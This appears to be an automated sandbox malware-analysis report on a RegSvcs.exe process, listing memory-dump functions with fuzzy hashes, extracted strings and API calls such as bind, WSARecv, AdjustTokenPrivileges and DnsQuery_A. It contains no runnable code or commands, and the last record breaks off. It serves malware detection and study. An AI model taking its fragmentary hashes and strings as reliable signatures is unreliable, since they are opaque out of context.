Instruction Fuzzy Hash: 39319B70D05228CBDB61DF69C888BD8BBF1EB59305F1191EAD409AB291D774AEC4CF41

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exe PID: 2936 Parent PID: 1848 RegSvcs.exeCOMMON

Executed Functions

Function 003838C8, Relevance: 7.0, Strings: 5, Instructions: 762COMMON

Download Yara Rule

Strings

HVq, xrefs: 00383CFE
T3, xrefs: 003840F8
0EVq, xrefs: 0038413B
HVq, xrefs: 00383D0A
*_4q, xrefs: 00384095

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: *_4q$0EVq$HVq$HVq$T3
API String ID: 0-3998057040
Opcode ID: 05df0e7a193f120b2c02f369a98c50930a304627309d2baf15a61a328e8c38e0
Instruction ID: 62d966a76d27760d46b7851fbcb791fc3081990633f05373d7d283bdd2233dbe
Opcode Fuzzy Hash: 05df0e7a193f120b2c02f369a98c50930a304627309d2baf15a61a328e8c38e0
Instruction Fuzzy Hash: 2152F571A04306CFCB16EF68C88096AFBB5FF85700B2585AAD449AB756D770EE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00382418, Relevance: 4.3, Strings: 3, Instructions: 505COMMON

Download Yara Rule

Strings

_4q, xrefs: 00382A3A
_4q, xrefs: 00382739
QA8, xrefs: 00382B1A

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: _4q$_4q$QA8
API String ID: 0-3115012904
Opcode ID: 813b3012d9bc7b122da395f4296e9261986a1fb62b787eb2d790852b8a9ab433
Instruction ID: bc1bc29e629ebe7fa2763b4319128dcd60a48b5ccbfb63f81a5694ecdcd11b38
Opcode Fuzzy Hash: 813b3012d9bc7b122da395f4296e9261986a1fb62b787eb2d790852b8a9ab433
Instruction Fuzzy Hash: DE12CE30E02315CFDB1AEF66D88066EB7F2BF85300F2581AED4169B695DB348D85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00388D88, Relevance: 3.0, Strings: 2, Instructions: 505COMMON

Download Yara Rule

Strings

_4q, xrefs: 003893AA
_4q, xrefs: 003890A9

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: _4q$_4q
API String ID: 0-3276247567
Opcode ID: 2a10142d911d8dd995cfee3fedb1865ec6b65780e2daed1017167071f52807c3
Instruction ID: 69d353337ed5bc5ac37ec1d6f0ee854cf4ecf52f727383a2f207e890f2436067
Opcode Fuzzy Hash: 2a10142d911d8dd995cfee3fedb1865ec6b65780e2daed1017167071f52807c3
Instruction Fuzzy Hash: B312CD30A00316DFDB25EF65D88476EB7F2BF94304F6984BAD0169B265DB749C82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0038B658, Relevance: 2.2, Strings: 1, Instructions: 915COMMON

Download Yara Rule

Strings

r, xrefs: 0038C10C

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: d197a785a775a8067ae074e38a281783cb373d5b816a8207275c90604065741e
Instruction ID: 0caee4b7330f0e2255ede75652b30a48a7abb577d9736d71033f9f9da38cd2ba
Opcode Fuzzy Hash: d197a785a775a8067ae074e38a281783cb373d5b816a8207275c90604065741e
Instruction Fuzzy Hash: A6823770A00706CFCB15DF68C884AADFBB2FF88310F2585A9D51AAB651D730E985CF94

Uniqueness

Uniqueness Score: -1.00%

Function 003D2998, Relevance: 1.6, APIs: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D2A4B

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: e3c2ba516c5293d4267149cd7ef58b4a784a420f2d742453d95d523ba6154e1a
Instruction ID: e5bec1b66c0681f0d0172081e97d757f2335a7e5f29d29ef25ec568d01d01190
Opcode Fuzzy Hash: e3c2ba516c5293d4267149cd7ef58b4a784a420f2d742453d95d523ba6154e1a
Instruction Fuzzy Hash: 1E31707650A3C09FE7138B209C55B56BFB8EF17214F0984DBE984CF1A3D2699909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 003D1463, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 003D14E3

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 6a41ef95cb276ef958b6eccf85cf123c84d6f9bfb718b9511e270bc4b1066be2
Instruction ID: 4e3f8f08f2e5278b62a5cb3ffd3b6145f4578d59737db086412511dbe73687d7
Opcode Fuzzy Hash: 6a41ef95cb276ef958b6eccf85cf123c84d6f9bfb718b9511e270bc4b1066be2
Instruction Fuzzy Hash: 9221D376509780AFEB238F25EC44B52BFB4EF06310F0985DBE9858B563D275D908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D2EA6, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D2F16

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: c926c95e60d2701a66c93526f284d83f0db4e4c4d1a8c542c5ad173ecc5fa697
Instruction ID: e5b0641ed81432f8096ef68c21a7bb8643e098d81cd4caebdcc0bdb3c6e1cc52
Opcode Fuzzy Hash: c926c95e60d2701a66c93526f284d83f0db4e4c4d1a8c542c5ad173ecc5fa697
Instruction Fuzzy Hash: 8111A272400304AFEB218F55DC44FABFBACEF04310F0489AAEA498A641D674E9499BB1

Uniqueness

Uniqueness Score: -1.00%

Function 003D169F, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 003D1715

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 7fb7981a74108ec24aecd0a298117e47f58af919b641a424de2b36723bcb362c
Instruction ID: 719b4a93a56d147fe979ccd47b104a6bb16bc58fac9ad2f415a4cddec0f4ca2e
Opcode Fuzzy Hash: 7fb7981a74108ec24aecd0a298117e47f58af919b641a424de2b36723bcb362c
Instruction Fuzzy Hash: 2F21C3765097C0AFDB238B20DC45A51FFB4EF16314F0980DBE9848B1A3D265A909DB62

Uniqueness

Uniqueness Score: -1.00%

Function 003D29EA, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E40,BA1810FE,00000000,00000000,00000000,00000000), ref: 003D2A4B

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: e24a299967e986c31fc19b0f26bf38f6fa7e0a1dcc8d7a29e67fe872b5956b25
Instruction ID: c47b37f9c72f59ee3cb9c765e5b07aa9dc557e3bf4ba4e4305cb6a2e111afdfc
Opcode Fuzzy Hash: e24a299967e986c31fc19b0f26bf38f6fa7e0a1dcc8d7a29e67fe872b5956b25
Instruction Fuzzy Hash: A7119076500304AFE721CF55DC85FABF7A8EF14320F1485ABED089B641DA74E9448AB1

Uniqueness

Uniqueness Score: -1.00%

Function 003D149A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 003D14E3

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 6ddad02c9dc11f2f5b4540ed5a67f2612636605ddc48936d706d286cab5c8cb6
Instruction ID: fb0d6fd2d01b4d74d8646cd39087e215ac3bae75b8278216818e52b577f6ec15
Opcode Fuzzy Hash: 6ddad02c9dc11f2f5b4540ed5a67f2612636605ddc48936d706d286cab5c8cb6
Instruction Fuzzy Hash: 3011A036500300AFEB21CF55E884B66FBF4EF04320F0884AAED4A8B652D275E454DB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D11C2, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 003D11F4

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 0aa82c381f872614d306f06122d06d26ae00db211ed2f20b335e57efef5c6de0
Instruction ID: 014b6ccaf72850ba5741537ece284245c2d9a365c5eb05a76a25f90360abeba6
Opcode Fuzzy Hash: 0aa82c381f872614d306f06122d06d26ae00db211ed2f20b335e57efef5c6de0
Instruction Fuzzy Hash: 4B01D176905344AFEB20CF55E889769FBA4EF44320F08C8ABDD488B742D275E548CA62

Uniqueness

Uniqueness Score: -1.00%

Function 003D16DA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 003D1715

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: cd783d5342be403a8036a66d689363001b984bd93e4ee794e0cc2a0e5ea2933e
Instruction ID: 025c63e0784fea896bceadd68ce8418703d60076dfa84fd31f30c1613b2f0385
Opcode Fuzzy Hash: cd783d5342be403a8036a66d689363001b984bd93e4ee794e0cc2a0e5ea2933e
Instruction Fuzzy Hash: CB01AD36500340EFEB218F15E885B65FFA4EF04720F08C09ADE894B762C271A458DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00389988, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b99c2f28d641bfa6ecb01ca0478cd26589ae22052566295d9b3baa1572338536
Instruction ID: 9d335598fbc03c6fc96bc87cd1d363ba9176719fadbe43908f2adad40972768b
Opcode Fuzzy Hash: b99c2f28d641bfa6ecb01ca0478cd26589ae22052566295d9b3baa1572338536
Instruction Fuzzy Hash: 99818F31F112159BDB15EB69C880B6EB7E3AFD4310F2A80BAE40AEB355DE35DD018790

Uniqueness

Uniqueness Score: -1.00%

Function 00389A4F, Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a55e4a8843b2aa249abb6dbb8d27ec2fd9447e17128f6bd168149b226a4e32f
Instruction ID: 5ff4f8571f170b2fc9aa5f58c1b9439e604f4e92dc9adeefc9bff1e489478834
Opcode Fuzzy Hash: 9a55e4a8843b2aa249abb6dbb8d27ec2fd9447e17128f6bd168149b226a4e32f
Instruction Fuzzy Hash: 60514C32F111158BD714DB69C940B6EB6E3AFD8314F2E80B5E409EB365DE35DD018790

Uniqueness

Uniqueness Score: -1.00%

Function 00389C9B, Relevance: 5.2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

Strings

p=I, xrefs: 00389E49
p>I, xrefs: 00389CC5
*_4q, xrefs: 00389D0F
, xrefs: 00389DDB

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: $*_4q$p=I$p>I
API String ID: 0-3115315055
Opcode ID: 036c8412f351bedda37c8a1751ae41558f2964c3bd174243eee3027265957d30
Instruction ID: 7c25b5e4756115af89e013269a8356c2fb13008a7023a9f50594e58fed780b08
Opcode Fuzzy Hash: 036c8412f351bedda37c8a1751ae41558f2964c3bd174243eee3027265957d30
Instruction Fuzzy Hash: CB51E431F042048FCB16EF79C8406BEBBB6EBC5315B2984BBC10ADB651DB359D068B95

Uniqueness

Uniqueness Score: -1.00%

Function 0038A870, Relevance: 5.1, Strings: 4, Instructions: 139COMMON

Download Yara Rule

Strings

hSI, xrefs: 0038A8B3
YI, xrefs: 0038A8C7
_4q, xrefs: 0038A87D
3, xrefs: 0038A949

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: _4q$ YI$hSI$3
API String ID: 0-3528227745
Opcode ID: 160046280082a44194c3c4a6e1dfea5a2e82f7c61d2d624e0a5244e3e7332473
Instruction ID: a5d95953bb3cae3d8abfcb9ceec975bbdf3bc268fd1c5ebd1def4a207ecdfe38
Opcode Fuzzy Hash: 160046280082a44194c3c4a6e1dfea5a2e82f7c61d2d624e0a5244e3e7332473
Instruction Fuzzy Hash: AE41E630B04B058FE716BB24D49062DBBD6AB85304F26C9AFD44B8BB41DB78DC41C796

Uniqueness

Uniqueness Score: -1.00%

Function 0038A860, Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

hSI, xrefs: 0038A8B3
YI, xrefs: 0038A8C7
_4q, xrefs: 0038A87D
3, xrefs: 0038A949

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: _4q$ YI$hSI$3
API String ID: 0-3528227745
Opcode ID: 2e68916ab3426f22e344db63b1910a4cf9d1b4674f7d50149860a7e4cc1e9145
Instruction ID: 6e68f0ae264cd53a3d23689aa252635c37c3acf1e6fb93664baf5e76102d75ec
Opcode Fuzzy Hash: 2e68916ab3426f22e344db63b1910a4cf9d1b4674f7d50149860a7e4cc1e9145
Instruction Fuzzy Hash: 0831A430A04B058BE715BF24D49472DBBA6BB85300F22C9AFC44B9BB45DB78EC41CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0038B0AF, Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

oI, xrefs: 0038B326
kI, xrefs: 0038B229
oI, xrefs: 0038B342

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: oI$ oI$kI
API String ID: 0-1626412329
Opcode ID: f253c4d1a64633d6a3b055ba3ecd7efc5022eff92eb2b01a4667d52d3b89dd98
Instruction ID: 11125501bdaf943065f1f8dc57e12ac182462e7a3fd9f5de6a0075f81dd8c8f2
Opcode Fuzzy Hash: f253c4d1a64633d6a3b055ba3ecd7efc5022eff92eb2b01a4667d52d3b89dd98
Instruction Fuzzy Hash: B881CC317006168BE708EF64C851BAEBBA3EF94300F55853DE109AB2A5CFB09D05CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00389738, Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

p>I, xrefs: 0038974E
*_4q, xrefs: 00389785
, xrefs: 00389856

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: $*_4q$p>I
API String ID: 0-2698797437
Opcode ID: 48cbce9d7186311a6c1108177e0414de91b76fc5651be4118eec55eb4d66e5ab
Instruction ID: df2a368a857c6316b8edec09c81b5683d418bd7eefe4887f6516a38af825d2be
Opcode Fuzzy Hash: 48cbce9d7186311a6c1108177e0414de91b76fc5651be4118eec55eb4d66e5ab
Instruction Fuzzy Hash: 6761C031B08305CFCB56EF64C8847BE77AAAB86314B2984FBD416DBA51DB31DC028791

Uniqueness

Uniqueness Score: -1.00%

Function 00382148, Relevance: 3.9, Strings: 3, Instructions: 196COMMON

Download Yara Rule

Strings

HVq, xrefs: 00382178
r*+, xrefs: 00382387
HVq, xrefs: 00382184

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: HVq$HVq$r*+
API String ID: 0-592346021
Opcode ID: 76faf8e0a2c4dc13244ed3d0d5d24552a2968adaf77eaf8c52d48ba700c2d957
Instruction ID: 7c324f8de2ca29be50d7f905dbff6cb3ee75faca61e4a2e4806ae24d07790e78
Opcode Fuzzy Hash: 76faf8e0a2c4dc13244ed3d0d5d24552a2968adaf77eaf8c52d48ba700c2d957
Instruction Fuzzy Hash: 8F71AF30A05309DFDB46EFA4C8856BFBBF5FF85300F2084AAC402A7655D7349941DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00389F18, Relevance: 3.8, Strings: 3, Instructions: 49COMMON

Download Yara Rule

Strings

8<I, xrefs: 00389F1E
h;I, xrefs: 00389F60
p=I, xrefs: 00389F44

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: 8<I$h;I$p=I
API String ID: 0-430083732
Opcode ID: 8d88c6a934a3c9ab4271e1bfabe1540e05cad22394ec953372e1f0e31a94aa63
Instruction ID: 282a51041cd44c4aca0dd29200472b957cc022618dbc0f39270ebed7021d0b34
Opcode Fuzzy Hash: 8d88c6a934a3c9ab4271e1bfabe1540e05cad22394ec953372e1f0e31a94aa63
Instruction Fuzzy Hash: 170121357406048F9B48EB78C01863D3BE7AFC921631140BAE10ADB361EF35AD458755

Uniqueness

Uniqueness Score: -1.00%

Function 003812E8, Relevance: 3.0, Strings: 2, Instructions: 461COMMON

Download Yara Rule

Strings

`eSq, xrefs: 00381391
=Vq, xrefs: 003813AC

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: `eSq$=Vq
API String ID: 0-1636267196
Opcode ID: 6710efd6ecc49fa7bc579a1faa7a7847411b0a3be6b94dc6996865b06260c85f
Instruction ID: eb275baa323f92525271c26c6929464c3b37c6f66ad17ad788de081f559634d6
Opcode Fuzzy Hash: 6710efd6ecc49fa7bc579a1faa7a7847411b0a3be6b94dc6996865b06260c85f
Instruction Fuzzy Hash: 9222E334A00705CFCB25EF64C480A6AB7F6FF89300B25859DD85A9B75ADB34AD85CF81

Uniqueness

Uniqueness Score: -1.00%

Function 003876C0, Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

HVq, xrefs: 00387809
HVq, xrefs: 003877FD

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: HVq$HVq
API String ID: 0-837252020
Opcode ID: 063b801418fbbe20e5324d016a2aa564fa2b4e3e577e1a24b054c48350b9d43c
Instruction ID: b055c234fade4c45348e93280423d4b3fcc328d1e56a61527cc96fe5e226707c
Opcode Fuzzy Hash: 063b801418fbbe20e5324d016a2aa564fa2b4e3e577e1a24b054c48350b9d43c
Instruction Fuzzy Hash: 3C515831B043098BDB09EBB9C4505AEB7F7AFD9710B24866AD40AAB345DF74ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00382DD0, Relevance: 2.6, Strings: 2, Instructions: 134COMMON

Download Yara Rule

Strings

*_4q, xrefs: 00382E1D
, xrefs: 00382EEE

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: $*_4q
API String ID: 0-3060316635
Opcode ID: ad2100ec9e4dcde5c740fc4c77ce0d69f5ba3b0168889306aa9f6a68d63fa2f2
Instruction ID: cefc3be78cf021ba3f7af91b374c88abb2f8a6165fcf2129d7affc02fbd8088e
Opcode Fuzzy Hash: ad2100ec9e4dcde5c740fc4c77ce0d69f5ba3b0168889306aa9f6a68d63fa2f2
Instruction Fuzzy Hash: 6741E170F043058FCB12FF65C8801AFB7B6AB84310B6985BADA56DBA45D631E842CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003814A0, Relevance: 2.6, Strings: 2, Instructions: 129COMMON

Download Yara Rule

Strings

=Vq, xrefs: 0038152A
`eSq, xrefs: 0038150F

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: `eSq$=Vq
API String ID: 0-1636267196
Opcode ID: bb302da698a59a8aaf00fbe04b30bdf0a41817eff63381a38f9319f19a8c1b56
Instruction ID: 59c5da8235f3585b521177f08d1700b59c659970d772c31d600bd9ad376f4eac
Opcode Fuzzy Hash: bb302da698a59a8aaf00fbe04b30bdf0a41817eff63381a38f9319f19a8c1b56
Instruction Fuzzy Hash: 6D51D534A00219CFDB55EF64C894B99B7F2BF99300F1041EAD40AAB36ADB359E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00388BE0, Relevance: 2.6, Strings: 2, Instructions: 98COMMON

Download Yara Rule

Strings

r*+, xrefs: 00388CF7
T0I, xrefs: 00388BEB

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: T0I$r*+
API String ID: 0-2119918428
Opcode ID: ab6bfaccb55977f67b0bf5f6957586309a248a4cad698ec144a2d099aa1f96d0
Instruction ID: 9502a74cc5ea60e73a74dd8257699712fe7c5e326a6019caa6759b93211421ed
Opcode Fuzzy Hash: ab6bfaccb55977f67b0bf5f6957586309a248a4cad698ec144a2d099aa1f96d0
Instruction Fuzzy Hash: B9416A30E02309DFDB59EFA5C5456AEFBF5FF44300F6084AAD402AB668DB358A44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0038D7AF, Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

xI, xrefs: 0038D7E4
\(L, xrefs: 0038D7C9

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: \(L$xI
API String ID: 0-2376068681
Opcode ID: 46d5b417369d722c0eeab3f32c7dafce0e412f9c8431c41d378bde5da4a5e6a2
Instruction ID: 9975121b24d034d1603859d83c8d7cd3801a9bb99c5cbb0edd2ecb7a5e1c977c
Opcode Fuzzy Hash: 46d5b417369d722c0eeab3f32c7dafce0e412f9c8431c41d378bde5da4a5e6a2
Instruction Fuzzy Hash: FB21BB707012058FDB48BF34D5146597BA1EB95308324C8BEA00AAF35ADBB6DC47CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0038C9A0, Relevance: 2.6, Strings: 2, Instructions: 56COMMON

Download Yara Rule

Strings

sI, xrefs: 0038CA1F
sI, xrefs: 0038C9EB

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: sI$sI
API String ID: 0-1609318538
Opcode ID: dd7d2fdd460065f3c3e5739aab9797edfa63a9146512535c1d650e9430a211a7
Instruction ID: c8adc37dbf89991bf23e9d745d32711cd3a4eaf61deb7e505c5f5ee7acd31082
Opcode Fuzzy Hash: dd7d2fdd460065f3c3e5739aab9797edfa63a9146512535c1d650e9430a211a7
Instruction Fuzzy Hash: B1110632700350AFC705AB34E884B393797AFE9B11B15507AE406DB399DB748C41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00710FD0, Relevance: 2.5, Strings: 2, Instructions: 26COMMON

Download Yara Rule

Strings

;.S, xrefs: 00710FF0, 00710FF5
\k, xrefs: 00710FD0

Memory Dump Source

Source File: 00000007.00000002.705058394.0000000000710000.00000040.00000001.sdmp, Offset: 00710000, based on PE: false

Similarity

API ID:
String ID: \k$;.S
API String ID: 0-2413470824
Opcode ID: 23e45295f65a678c3729956d65db577150d9994df29bff50125b86e0b2e14d4d
Instruction ID: deb2927a118e5938879237184f547bdc838611a9d672e0ae68f3f9a43b358067
Opcode Fuzzy Hash: 23e45295f65a678c3729956d65db577150d9994df29bff50125b86e0b2e14d4d
Instruction Fuzzy Hash: 92E02032B841500FD309E16899529F97B958BE370031540AFF406DB7E1C777CC5647D1

Uniqueness

Uniqueness Score: -1.00%

Function 00388B58, Relevance: 2.5, Strings: 2, Instructions: 26COMMON

Download Yara Rule

Strings

HVq, xrefs: 00388B97
HVq, xrefs: 00388B8B

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: HVq$HVq
API String ID: 0-837252020
Opcode ID: 8c68db11e95fae35605c6c075b54d0a29d186e6d918dc48347ae32ef79801f7c
Instruction ID: f676b667288ff2ad1ff29ac584bfb5ac0eeaafe1958823007091a35a891b79fe
Opcode Fuzzy Hash: 8c68db11e95fae35605c6c075b54d0a29d186e6d918dc48347ae32ef79801f7c
Instruction Fuzzy Hash: A0E0D131F0122547CB563BA8EC1456877E9EBCCAE13210176D906D7304DD714C418BD1

Uniqueness

Uniqueness Score: -1.00%

Function 003D1950, Relevance: 1.6, APIs: 1, Instructions: 127networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,00000E40,?,?), ref: 003D1A46

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 4208a7066aadcb2664ed3069244d8be431a5f6648ed6c9a9d1b72e3b1469f357
Instruction ID: 871727559c661ef7e62eb451098233d44b19f7364e514e518bfc8a4ccbeaec38
Opcode Fuzzy Hash: 4208a7066aadcb2664ed3069244d8be431a5f6648ed6c9a9d1b72e3b1469f357
Instruction Fuzzy Hash: CE41116540E7C06FD3138B349C61A61BF74AF47614B0E85CBE8C4CF5A3D269690AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 001CAF50, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?,00000E40,?,?), ref: 001CAFEA

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 933f5c30a611ed7ad232a355553f14973b4c6752eb19d2edf78f977c4be92871
Instruction ID: 48f4fb63365908b3200df680f566e7147e80303710adcc570a35c1f26f53ab1c
Opcode Fuzzy Hash: 933f5c30a611ed7ad232a355553f14973b4c6752eb19d2edf78f977c4be92871
Instruction Fuzzy Hash: 7931A17150E3C06FD7138B259C51B65BFB4EF47620F0A41DFD884CB5A3D229A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 003D0EB8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,00000E40), ref: 003D0F5B

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b145ea6f603c602c8b600bcb46f08343c1649582f66e1eb3c7b1846ebaac778e
Instruction ID: bd767ed8db9f3474394256fc1ca9f2c885a8fb8945b396ea19ecb52a1e40a905
Opcode Fuzzy Hash: b145ea6f603c602c8b600bcb46f08343c1649582f66e1eb3c7b1846ebaac778e
Instruction Fuzzy Hash: 3F31B172504344AFEB228F65DC44FA7BFACEF05720F0489ABF985CB152D225E909DB61

Uniqueness

Uniqueness Score: -1.00%

Function 003D0C58, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNELBASE(?,00000E40,?,?), ref: 003D0D1A

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: 8ff42f9476f6aaf8cc7716ab0243b949a39c44d85e3500828fdda42871340a5a
Instruction ID: f4b38bdf2717c8a318f1ee1614373dd4e39a11619a152aeae2d0116c7bc41310
Opcode Fuzzy Hash: 8ff42f9476f6aaf8cc7716ab0243b949a39c44d85e3500828fdda42871340a5a
Instruction Fuzzy Hash: EC317C6140E3C05FD3038B259C51B62BFB4EF47620F0E85DBD8848F5A3D229A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 003D0390, Relevance: 1.6, APIs: 1, Instructions: 93registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00000E40), ref: 003D045E

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: ed4cfda8462ec963085714941e6745c064cbcafd60b59bd87d672838783cee85
Instruction ID: 6d11e66f16f5ce2231e0730ed1f5d8c5b8af214fd6d801a227299174e59ae024
